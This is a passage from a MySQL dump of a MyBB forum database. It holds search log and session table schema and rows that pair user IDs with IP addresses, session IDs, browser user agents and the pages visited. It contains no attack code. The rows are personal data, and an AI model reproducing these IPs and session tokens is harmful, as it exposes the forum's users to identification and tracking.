'7539,7525,7524,7514,7513,7510,7509,7508,7506,7502,7499,7498,7467,7466,7465,7432,7407,7405,7404,7345,7344,7340,7339,7337,7336,7325,7324,7310,7296,7269,7265,7264,7263,7262,7248,7247,7229,7228,7227,7225,7188,7187,7184,7180,7178,7155,7140,7139,7137,7135,7086,7085,7084,7059,7058,7056,7055,7054,7053,7052,7036,7007,7006,7005,7004,7003,7002,6989,6964,6963,6952,6909,6904,6897,6896,6895,6872,6868,6867,6846,6845,6836,6824,6823,6817,6816,6815,6814,6810,6808,6807,6806,6738,6737,6713,6693,6686,6684,6683,6682', 'posts', '', ''); INSERT INTO `mybb_searchlog` (`sid`, `uid`, `dateline`, `ipaddress`, `threads`, `posts`, `resulttype`, `querycache`, `keywords`) VALUES ('fb8aecb9b0e867452ae43121974c6d40', '1', '1352823636', '165.155.212.73', '', '', 'threads', 't.lastpost >=\'1352737236\' AND t.fid NOT IN (\'36\',\'37\',\'39\',\'40\',\'41\',\'38\') AND t.fid NOT IN (36,37,39,40,41,38)', ''); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_sessions`; CREATE TABLE `mybb_sessions` ( `sid` varchar(32) NOT NULL DEFAULT '', `uid` int(10) unsigned NOT NULL DEFAULT '0', `ip` varchar(40) NOT NULL DEFAULT '', `time` bigint(30) NOT NULL DEFAULT '0', `location` varchar(150) NOT NULL DEFAULT '', `useragent` varchar(100) NOT NULL DEFAULT '', `anonymous` int(1) NOT NULL DEFAULT '0', `nopermission` int(1) NOT NULL DEFAULT '0', `location1` int(10) NOT NULL DEFAULT '0', `location2` int(10) NOT NULL DEFAULT '0', PRIMARY KEY (`sid`), KEY `location1` (`location1`), KEY `location2` (`location2`), KEY `time` (`time`), KEY `uid` (`uid`), KEY `ip` (`ip`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; LOCK TABLES `mybb_sessions` WRITE; INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a7d59fa7486ec85d320b08fe2a2701ab', '6', '77.253.195.126', '1341496717', '/usercp.php?action=email', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('04711c808fe83ad7ba4fbd1d1b3ea1f8', '10', '86.186.29.81', '1341932665', '/search.php?&amp;action=do_search', 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0.1', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('594bdfc150fd7cb13be6a6dfbde9d2bb', '209', '94.43.75.187', '1349019810', '/showthread.php?tid=98', 'Opera/9.80 (Windows NT 6.1; U; en) Presto/2.10.289 Version/12.02', '0', '0', '20', '98'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('371789274bed8b627ce7d8d27fbdf154', '10', '81.151.165.146', '1342184206', '/showthread.php?tid=16', 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0.1', '0', '0', '11', '16'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('21f1bf5da5525bfce66399810a0ef47c', '11', '78.146.232.150', '1342431612', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.7 (KHTML, like Gecko) RockMelt/0.16.91.472 Chrome/16.0.', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6010b035ef52dfc2d99edfc8ed3f4692', '17', '95.141.28.53', '1342354845', '/showthread.php?tid=20', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.1', '0', '0', '13', '20'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('27c1db5bc35c6134d29e868a009264e7', '19', '93.186.23.84', '1342471698', '/newreply.php?ajax=1&amp;action=do_newreply&amp;tid=19', 'Mozilla/5.0 (BlackBerry; U; BlackBerry 9300; en-GB) AppleWebKit/534.8+ (KHTML, like Gecko) Version/6', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d9a8cb07648b7baa1af2ec5feecf1e9a', '138', '71.207.111.91', '1346959057', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5a2dfbb66257d72d42e7b03d1f8322b7', '27', '80.72.152.146', '1349778347', '/showthread.php?tid=78', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4', '0', '0', '7', '78'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d529a4df94212eaab985a469b7660887', '24', '97.94.186.133', '1343975842', '/upgrade.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('46bad83386f81bdecbb272aa76a939b9', '23', '87.55.209.8', '1343947908', '/showthread.php?tid=48', 'Mozilla/5.0 (iPhone; U; CPU iPhone OS 5_1_1 like Mac OS X; es-es) AppleWebKit/534.46.0 (KHTML, like ', '0', '0', '21', '48'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6eb2cc08fcf492ab0d1ab3cd97b07727', '31', '174.61.77.86', '1344084386', '/index.php?', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0e1aebf4dcbff7bdb6e45f5fa44fa954', '71', '71.60.105.178', '1345242792', '/member.php?action=profile&amp;uid=71', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.79 Safari', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0140825a6519686c2203ac4f4f1b7ff5', '44', '207.172.50.206', '1344876923', '/showthread.php?tid=52', 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.75 Safari/537.1', '0', '0', '9', '52'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('030e13c5cb7c5d62d466a2aebb0982f3', '26', '121.54.53.253', '1344841701', '/search.php?action=results&amp;sid=3bd4223bd7ad133a5ab69491c7f659ea', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.75 Safari/537.1', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2cf9fa1af75ef85d8d5e4a1496a22b83', '45', '117.204.211.6', '1344883160', '/showthread.php?tid=30', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.18 (KHTML, like Gecko) Chrome/18.0.1010.1 Safari', '0', '0', '15', '30'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3fca9735a6554648b81bddb496aef52a', '51', '180.215.45.255', '1344958318', '/search.php?action=results&amp;sid=f2a469f13b52d91bc33bf9852d3e9ae3', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.77 Safari', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('66ade9aac7087160189f817e933bf521', '56', '98.86.145.224', '1344994789', '/showthread.php?tid=77', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.77 Safari', '0', '0', '16', '77'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('86312ff118a36c0306346830dea2b8f9', '64', '93.87.231.108', '1345811920', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e5ec8f8b626a7b5e6c7c3afadff1a7ff', '50', '182.177.109.83', '1345601732', '/memberlist.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.79 Safari', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('618a8bf8ae23eb8f9fdfe25ec2e3b231', '137', '142.161.233.109', '1346124971', '/misc.php?action=dstswitch&amp;ajax=1', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safar', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('cf4576ddaefb3c1b58263cadda99190c', '70', '76.69.98.41', '1345220015', '/member.php?action=emailuser&amp;uid=67', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.79 Safari/537.1', '0', '1', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d6ac285f7436d2cabe5bcf74f6769306', '60', '117.217.209.184', '1345225764', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20100101 Firefox/15.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('eb043ca611a9d95501907e150e818b4e', '72', '78.58.52.147', '1345299535', '/private.php?action=read&amp;pmid=222', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.79 Safari/537.1', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('98d56dd021951e5ea716afa40726d3e4', '97', '70.173.58.33', '1345640391', '/misc.php?action=dstswitch&amp;ajax=1', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.79 Safari', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6baa38445daaca02188e4486fd700d1b', '87', '2.222.163.112', '1346787488', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.83 Safari', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('82473685d4b0c52ed16b112b0907f9bf', '101', '66.87.4.160', '1346379487', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.83 Safari', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('481da73dfce6e8ce2dd1511e2bb0fe72', '114', '70.143.76.31', '1346109524', '/memberlist.php?sort=regdate&amp;order=ascending&amp;perpage=20', 'Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0a17e3626728093453a6218c7447b34a', '108', '5.135.12.96', '1345810768', '/usercp.php?action=editsig', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.5) Gecko/20091109 Ubuntu/9.10 (karmic) Firefox/3.5.', '0', '1', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('698a7bd83c717ecc6943067d206eeeea', '113', '92.5.146.21', '1345831410', '/showthread.php?tid=185&amp;pid=646', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.83 Safari/537.1', '0', '0', '4', '185'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e9a7d70fefdc57b54786de3b5223fe32', '120', '182.50.64.67', '1345888248', '/search.php?', 'Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9c37d81898c69b944a3b314bc54c7d7a', '128', '213.49.119.132', '1345918637', '/showthread.php?tid=113', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.83 Safari', '0', '0', '15', '113'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9bdfb0f95a829b629195720dbdeb2766', '119', '216.38.2.194', '1345900004', '/forumdisplay.php?fid=40', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1', '0', '0', '40', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('710a60de4d202e5243f4b8985c5656b4', '122', '69.15.13.113', '1346190350', '/forumdisplay.php?fid=10', 'Mozilla/5.0 (Linux; U; Android 2.3.4; en-us; SCH-R720 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, l', '0', '0', '10', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d7699835bcea0456545fd25c4efd1b57', '123', '87.151.195.77', '1345907481', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.83 Safari', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ab490f6f4849774deee0372bade2183d', '116', '2.98.233.26', '1346350994', '/showthread.php?tid=186', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.83 Safari/537.1', '0', '0', '16', '186'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('004df2d8cfff218ec27c9e8ef1eaee2b', '124', '134.3.161.123', '1345913832', '/index.php?', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.83 Safari/537.1', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e95a2a934c758be9834e9cff6d95bd97', '125', '42.106.175.146', '1350223657', '/usercp.php?action=usergroups', 'Opera/9.80 (J2ME/MIDP; Opera Mini/4.4.26918/28.2725; U; en) Presto/2.8.119 Version/11.10', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d23fb860a467b98fe22727a2bb381adb', '129', '24.126.110.197', '1345971568', '/member.php?action=profile&amp;uid=129', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('46795db90ac294b74c7ac58b55e08f3e', '131', '217.123.173.181', '1345975455', '/showthread.php?tid=153', 'Opera/9.80 (Windows NT 6.1; WOW64; U; nl) Presto/2.10.289 Version/12.01', '0', '0', '34', '153'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('952689f52429ce5f77b11a6731aa39e2', '132', '24.50.23.117', '1346620766', '/forumdisplay.php?fid=16', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.83 Safari', '0', '0', '16', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7e753be1f2bdb13d66ce5ff1ac682299', '133', '74.125.178.31', '1346041044', '/member.php?&amp;action=do_login', 'Mozilla/5.0 (Windows NT 5.1; rv:14.0) Gecko/20100101 Firefox/14.0.1 AppEngine-Google; (+http://code.', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e6d632ba9310f9ede53bea5413bbb3d0', '139', '24.132.198.229', '1346531651', '/showthread.php?tid=281', 'Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1', '0', '0', '29', '281'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f017a157099e6d244a53d5aedf579359', '141', '72.134.24.117', '1346702906', '/showthread.php?tid=321', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1', '0', '0', '34', '321'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f6a4b759ab20b1c31ce16772f24c91da', '147', '188.22.16.120', '1346266848', '/showthread.php?tid=271', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0', '0', '0', '53', '271'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('005bd30018a38de03e9d5e2146dc2cf7', '148', '183.83.29.21', '1346306562', '/search.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('311425947f89e209c50983892550a761', '155', '173.52.27.23', '1346370888', '/misc.php?action=dstswitch&amp;ajax=1', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.83 Safari', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('027a91071b75ea196cebb595a301cbc4', '151', '60.52.87.169', '1346346477', '/showthread.php?tid=148', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1', '0', '0', '12', '148'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('84b04f332b664c9b37810b4a696dda24', '158', '68.40.229.156', '1346719969', '/showthread.php?tid=281', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.83 Safari', '0', '0', '29', '281'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('736536cd6463355022f28c40250911e5', '153', '173.245.52.108', '1346361446', '/showthread.php?tid=103', 'Mozilla/5.0 (Windows NT 6.0; rv:15.0) Gecko/20100101 Firefox/15.0', '0', '0', '12', '103'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('936b5cc158b08e6ead7e17e8a40c7377', '154', '92.234.104.156', '1346403789', '/usercp.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.83 Safari', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('57d932d957a330099c0828dbc1bd0b36', '159', '65.27.123.23', '1346596694', '/showthread.php?tid=32', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:15.0) Gecko/20100101 Firefox/15.0', '0', '0', '16', '32'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ad329716c7010662d2732219537b3807', '154', '86.29.242.162', '1346496503', '/forumdisplay.php?fid=54', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.83 Safari', '0', '0', '54', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('16cb8643df35b6206adb823eeac6a2f8', '161', '164.58.144.196', '1346781406', '/index.php?', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.5072', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('10bcd52f488c78f62433c5860be05d53', '50', '182.177.53.90', '1346448942', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.83 Safari', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a11d076833ae776bcc6ec27030a91a7f', '159', '63.131.6.24', '1346526472', '/index.php?', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.5072', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('31595d2ed018d46b94e091f557b454e2', '164', '181.1.202.219', '1346530403', '/forumdisplay.php?fid=9', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.83 Safari', '0', '0', '9', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e6b952d8716ee6ef1f1510489c733d87', '165', '209.73.132.221', '1346552886', '/forumdisplay.php?fid=52', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:11.0) Gecko/20100101 Firefox/11.0', '0', '0', '52', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ee9857161126d53b11b4a6c5742a538a', '168', '178.239.48.14', '1346853572', '/newthread.php?fid=3&amp;processed=1&amp;action=do_newthread&amp;tid=', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0 AlexaToolbar/alxf-2.15', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3e9903bfb9e7c88ad63d24f859b58512', '167', '83.147.183.30', '1346689380', '/showthread.php?tid=238', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.83 Safari', '0', '0', '56', '238'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('fe14ae925eff57fd980ec26240c62d38', '171', '67.68.224.95', '1346873495', '/forumdisplay.php?fid=15', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari', '0', '0', '15', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('204fe2f40c2a52050b13880a66797934', '173', '99.228.31.50', '1346803209', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/15.0 Firefox/15.0a1', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('195148c8ef39f40cd80d23be3f1eb25e', '174', '65.49.68.185', '1346838524', '/index.php?', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR ', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b0f190d02ce679f8727a61b0d1526185', '191', '24.190.244.64', '1347770311', '/showthread.php?tid=275', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari', '0', '0', '12', '275'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7d1b1243d013cf860b0334c012cfcb86', '192', '24.6.164.63', '1347875371', '/search.php?action=results&amp;sid=d78d2c2ba6f6c8cd2d5f9f9b54d4c25c&amp;sortby=lastpost&amp;order=desc&amp;uid=0', 'Mozilla/5.0 (Windows NT 6.0; rv:15.0) Gecko/20100101 Firefox/15.0.1', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('61621f627e7a5c285f2669f2e74c6148', '178', '94.13.132.145', '1346968848', '/private.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari', '0', '1', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('afafddb994a3b4c9558b23494a1cf356', '90', '161.73.47.173', '1351214977', '/showthread.php?tid=1012', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari', '0', '0', '16', '1012'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('33920cbf73f5ba7c24a2c23629d5502c', 